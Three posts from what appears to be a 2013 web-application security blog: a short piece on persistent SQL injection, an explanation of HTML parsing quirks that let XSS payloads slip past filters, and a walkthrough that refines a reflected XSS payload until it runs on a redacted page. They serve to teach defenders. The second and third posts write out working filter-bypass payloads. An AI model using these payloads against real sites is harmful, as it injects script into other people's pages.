-
The article rate here slowed down in February due to my preparation for B-Sides SF and RSA 2013. I even had to give a brief presentation about Hacking Web Apps at my company’s booth. (Followed by a successful book signing. Thank you!)
In that presentation I riffed off several topics repeated throughout this site. One topic was the mass hysteria we are forced to suffer from web sites that refuse to write safe SQL statements.
Those of you who are developers may already be familiar with a SQL-related API, though some may not be aware that the acronym stands for Advanced Persistent Ignorance.
Here’s a slide I used in the presentation (slide 13 of 29). Since I didn’t have enough time to complete nine years of research I left blanks for the audience to fill in.
Now you can fill in the last line. Security company Bit9 admitted last week to a compromise that was led by a SQL injection exploit. Sigh. The good news was that no massive database of usernames and passwords (hashed or not) went walkabout. The bad news was that attackers were able to digitally sign malware with a stolen Bit9 code-signing certificates.
I don’t know what I’ll add as a fill-in-the-blank for 2014. Maybe an entry for NoSQL. After all, developers love to reuse an API. String concatenation in JavaScript is no better that doing the same for SQL.
If we can’t learn from PHP’s history in this millennium, perhaps we can look further back for more fundamental lessons. The Greek historian Polybius noted how Romans protected passwords (watchwords) in his work, Histories1:
To secure the passing round of the watchword for the night the following course is followed. One man is selected from the tenth maniple, which, in the case both of cavalry and infantry, is quartered at the ends of the road between the tents; this man is relieved from guard-duty and appears each day about sunset at the tent of the Tribune on duty, takes the tessera or wooden tablet on which the watchword is inscribed, and returns to his own maniple and delivers the wooden tablet and watchword in the presence of witnesses to the chief officer of the maniple next his own; he in the same way to the officer of the next, and so on, until it arrives at the first maniple stationed next the Tribunes. These men are obliged to deliver the tablet (tessera) to the Tribunes before dark.
More importantly, the Romans included a consequence for violating the security of this process:
If they are all handed in, the Tribune knows that the watchword has been delivered to all, and has passed through all the ranks back to his hands: but if any one is missing, he at once investigates the matter; for he knows by the marks on the tablets from which division of the army the tablet has not appeared; and the man who is discovered to be responsible for its non-appearance is visited with condign punishment.
We truly need a fitting penalty for SQL injection vulnerabilities; perhaps only tempered by the judicious use of salted, hashed passwords.
-
Polybius, Histories, trans. Evelyn S. Shuckburgh (London, New York: Macmillan, 1889), Perseus Digital Library. https://data.perseus.org/citations/urn:cts:greekLit:tlg0543.tlg001.perseus-eng1:6.34 (accessed March 5, 2013). ↩
• • • -
-
When designing security filters against HTML injection you need to outsmart the attacker, not the browser. HTML’s syntax is more forgiving of mis-nested tags, unterminated elements, and entity-encoding compared to formats like XML. This is a good thing, because it ensures a User-Agent renders a best-effort layout for a web page rather than bailing on errors or typos that would leave visitors staring at blank pages or incomprehensible error messages.
It’s also a bad thing, because User-Agents have to make educated guesses about a page author’s intent when it encounters unexpected markup. This is the kind of situation that leads to browser quirks and inconsistent behavior.
One of HTML5’s improvements is a codified algorithm for parsing content. In the past, browsers not only had quirks, but developers would write content specifically to take advantage of those idiosyncrasies – giving us a world where sites worked with one and only one version of Internet Explorer. A great deal of blame lays at the feet of developers who refused to consider interoperable HTML design and instead chose the principle of Code Relying on Awful Patterns.
Parsing Disharmony
Untidy markup is a security hazard. It makes HTML injection vulns more difficult to detect and block, especially for regex-based countermeasures.
Regular expressions have irregular success as security mechanisms for HTML. While regexes excel at pattern-matching they fare miserably in semantic parsing. Once you start building a state mechanism for element start characters, token delimiters, attribute names, and so on, anything other than a narrowly-focused regex becomes unwieldy at best.
First, let’s take a look at some simple elements with uncommon syntax. Regular readers will recognize a favorite XSS payload of mine, the
img
tag:<img/alt=""src="."onerror=alert(9)>
Spaces aren’t required to delimit attribute name/value pairs when the value is marked by quotes. Also, the element name may be separated from its attributes with whitespace or the forward slash. We’re entering forgotten parsing territory. For some sites, this will be a trip to the undiscovered country.
Delimiters are fun to play with. Here’s a case where empty quotes separate the element name from an attribute. Note the difference in value delineation. The
id
attribute has an unquoted value, so we separate it from the subsequent attribute with a space. Thehref
has an empty value delimited with quotes. The parser doesn’t need whitespace after a quoted value, so we putonclick
immediately after.<a""id=a href=""onclick=alert(9)>foo</a>
Browsers try their best to make sites work. As a consequence, they’ll interpret markup in surprising ways. Here’s an example that mixes start and end tag tokens in order to deliver an XSS payload:
<script/<a>alert(9)</script>
We can adjust the end tag if there’s a filter watching for
</script>
. In the following payload, note the space between the last</script
and</a>
.<script/<a>alert(9)</script </a>
Successful HTML injection thrives on bad mark-up to bypass filters and take advantage of browser quirks. Here’s another case where the browser accepts an incorrectly terminated tag. If the site turns the following payload’s
%0d%0a
into\r\n
(carriage return, line feed) when it places the payload into HTML, then the browser might execute thealert
function.<script%0d%0aalert(9)</script>
Or you might be able to separate the lack of closing
>
character from thealert
function with an intermediate HTML comment:<script%20<!--%20-->alert(9)</script>
The way browsers deal with whitespace is a notorious source of security problems. The Samy worm exploited IE’s tolerance for splitting a
javascript:
scheme with a line feed.<div id=mycode style="BACKGROUND: url('java script:eval(document.all.mycode.expr)')" expr="alert(9)"></div>
Or we can throw an entity into the attribute list. The following is bad markup. But if it’s bad markup that bypasses a filter, then it’s a good injection.
<a href=""&/onclick=alert(9)>foo</a>
HTML entities have a special place within parsing and injection attacks. They’re most often used to bypass string-matching. For example, the following three schemes use an entity for the “s” character:
javascript:alert(9) javascript:alert(9) javascript:alert(9)
The danger with entities and parsing is that you must keep track of the context in which you decode them. But you also need to keep track of the order in which you resolve entities (or otherwise normalize data) and when you apply security checks. In the previous example, if you had checked for “javascript” in the scheme before resolving the entity, then your filter would have failed. Think of it as a time of check to time of use (TOCTOU) problem that’s affected by data transformation rather than the more commonly thought-of race condition.
Security
User Agents are often forced to second-guess the intended layout of error-ridden pages. HTML5 brings more sanity to parsing markup. But we still don’t have a mechanism to help browsers distinguish between typos, intended behavior, and HTML injection attacks. There’s no equivalent to prepared statements for SQL.
- Fix the vuln, not the exploit – It’s not uncommon for developers to denylist a string like alert or javascript under the assumption that doing so prevents attacks. That sort of thinking mistakes the payload for the underlying problem. The problem is placing user-supplied data into HTML without taking steps to ensure the browser renders the data as text rather than markup.
- Test with multiple browsers – A payload that takes advantage of a rendering quirk for browser A isn’t going to exhibit security problems if you’re testing with browser B.
- Prefer parsing to regex patterns – Regexes may be as effective as they are complex, but you pay a price for complexity. Trying to read someone else’s regex, or even maintaining your own, becomes more error-prone as the pattern becomes longer.
- Encode characters at their point of presentation – You’ll be more successful at blocking HTML injection attacks if you consistently apply encoding rules for characters like
<
and>
and prevent quotes from breaking attribute values. - Define clear expectations – Ambiguity for browsers enables them to recover from errors gracefully. Ambiguity for security weakens the system.
HTML injection attacks try to bypass filters in order to deliver a payload that a browser will render. Security filters should be strict, by not so myopic that they miss “improper” HTML constructs that a browser will happily render.
• • • -
HTML injection vulns make a great Voight-Kampff test for showing you care about security. They’re a way to identify those who resort to the excuse, “But it’s not exploitable.”
The first versions of PCI DSS explicity referenced cross-site scripting (XSS) to encourage sites to take it seriously. Since failure to comply with that standard can lead to fines or loss of credit card processing, it sometimes drove perverse incentives. Every once in a while a site’s owners might refuse to acknowledge a vuln is valid because they don’t see an
alert
pop up from a test payload. In other words, they claim that the vuln’s risk is negligible since it doesn’t appear to be exploitable.(They also misunderstand that having a vuln doesn’t automatically mean they’ll face immediate consequences. The standard is about practices and processes for addressing vulns as much as it is for preventing them in the first place.)
In any case, the focus on
alert
payloads is misguided. If the site reflects arbitrary characters from the user, that’s a bug that should be fixed. And we can almost always refine a payload to make it work. Even for the dead-simplealert
.(1) Probe for Reflected Values
In the simplest form of this exampe, a URL parameter’s value is written into a JavaScript string variable called
pageUrl
. An easy initial probe is inserting a single quote (%27
in the URL examples):https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27
The code now has an extra quote hanging out at the end of the
pageUrl
variable:function SetLanCookie() { var index = document.getElementById('selectorControl').selectedIndex; var lcname = document.getElementById('selectorControl').options[index].value; var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a''; if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){ var hflanguage = document.getElementById(getClientId().HfLanguage); hflanguage.value = '1'; } $.cookie('LanCookie', lcname, {path: '/'}); __doPostBack('__Page_btnLanguageLink','') }
But when the devs go to check the vuln, they claim that it’s not possible to issue an
alert()
. For example, they update the payload with something like this:https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;alert(9)//
The payload is reflected in the HTML, but no pop up appears. Nor do any variations seem to work. Nothing results in JavaScript execution. There’s a reflection point, but no execution.
(2) Break Out of One Context, Break Into Another
We can be more creative about our payload. HTML injection attacks are a coding exercise like any other – they just tend to be a bit more fun. So, it’s time to debug.
Our payload is reflected inside a JavaScript function scope. Maybe the
SetLanCookie()
function just isn’t being called within the page. That would explain why thealert()
never runs.A reasonable step is to close the function with a curly brace and dangle a naked
alert()
within the script block.https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;var%20a=%27
The following code confirms that the site still reflects the payload (see line 4). However, our browser still doesn’t launch the desired pop-up.
function SetLanCookie() { var index = document.getElementById('selectorControl').selectedIndex; var lcname = document.getElementById('selectorControl').options[index].value; var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a'}alert(9);var a=''; if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){ var hflanguage = document.getElementById(getClientId().HfLanguage); hflanguage.value = '1'; } $.cookie('LanCookie', lcname, {path: '/'}); __doPostBack('__Page_btnLanguageLink','') }
But browsers have Developer Consoles that print friendly messages about their activity! Taking a peek at the console output reveals why we have yet to succeed in firing an
alert()
. The script block still contains syntax errors. Unhappy syntax makes an unhappy browser and an unhappy hacker.[14:36:45.923] SyntaxError: function statement requires a name @ https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert(9);function(){var%20a=%27 SomePage.aspx:345 [14:42:09.681] SyntaxError: syntax error @ https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27;}()alert(9);function(){var%20a=%27 SomePage.aspx:345
(3) Capture the Function Body
When we terminate the JavaScript string, we must also remember to maintain clean syntax for what follows the payload. In trivial cases, you can get away with an inline comment like
//
.Another trick is to re-capture the remainder of a quoted string with a new variable declaration. In the previous example, this is why there’s a
;var a ='
inside the payload.In this case, we need to re-capture the dangling function body. This is why you should know the JavaScript language rather than just memorize payloads. It’s not hard to make this attack work – just update the payload with an opening function statement, as below:
https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;function%28%29{var%20a=%27
The page reflects the payload and now we have nice, syntactically happy JavaScript code (whitespace added for legibility).
function SetLanCookie() { var index = document.getElementById('selectorControl').selectedIndex; var lcname = document.getElementById('selectorControl').options[index].value; var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a' } alert(9); function(){ var a=''; if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){ var hflanguage = document.getElementById(getClientId().HfLanguage); hflanguage.value = '1'; } $.cookie('LanCookie', lcname, {path: '/'}); __doPostBack('__Page_btnLanguageLink','') }
So, we’re almost there. But the pop-up remains elusive. The function still isn’t firing.
(4) Var Your Function
Ah! We created a function, but forgot to name it. Normally, JavaScript doesn’t care about explicit names, but it needs a scope for unnamed, anonymous functions like ours. For example, the following syntax creates and executes an anonymous function that generates an
alert
:(function(){alert(9)})()
We don’t need to be that fancy, but it’s nice to remember our options. We’ll assign the function to another
var
.https://redacted/SomePage.aspx?ACCESS_ERRORCODE=a%27}alert%289%29;var%20a=function%28%29{var%20a=%27
Finally, we reach a point where the payload inserts an
alert()
and modifies the surrounding JavaScript context so the browser has nothing to complain about. In fact, the payload is convoluted enough that it doesn’t trigger the browser’s XSS Auditor. (Which you shouldn’t be relying on, anyway. I mention it as a point of trivia.)Behold the fully exploited page, with spaces added for clarity:
function SetLanCookie() { var index = document.getElementById('selectorControl').selectedIndex; var lcname = document.getElementById('selectorControl').options[index].value; var pageUrl = '/SomePage.aspx?ACCESS_ERRORCODE=a' } alert(9); var a = function(){ var a =''; if(pageUrl.toLowerCase() == '/OtherPage.aspx'.toLowerCase()){ var hflanguage = document.getElementById(getClientId().HfLanguage); hflanguage.value = '1'; } $.cookie('LanCookie', lcname, {path: '/'}); __doPostBack('__Page_btnLanguageLink','') }
I dream of a world without HTML injection. I also dream of Electric Sheep.
I’ve seen XSS and SQL injection you wouldn’t believe. Articles on fire off the pages of this blog. I watched scanners glitter in the dark near an appsec program. All those moments will be lost in time…like tears in rain.
• • •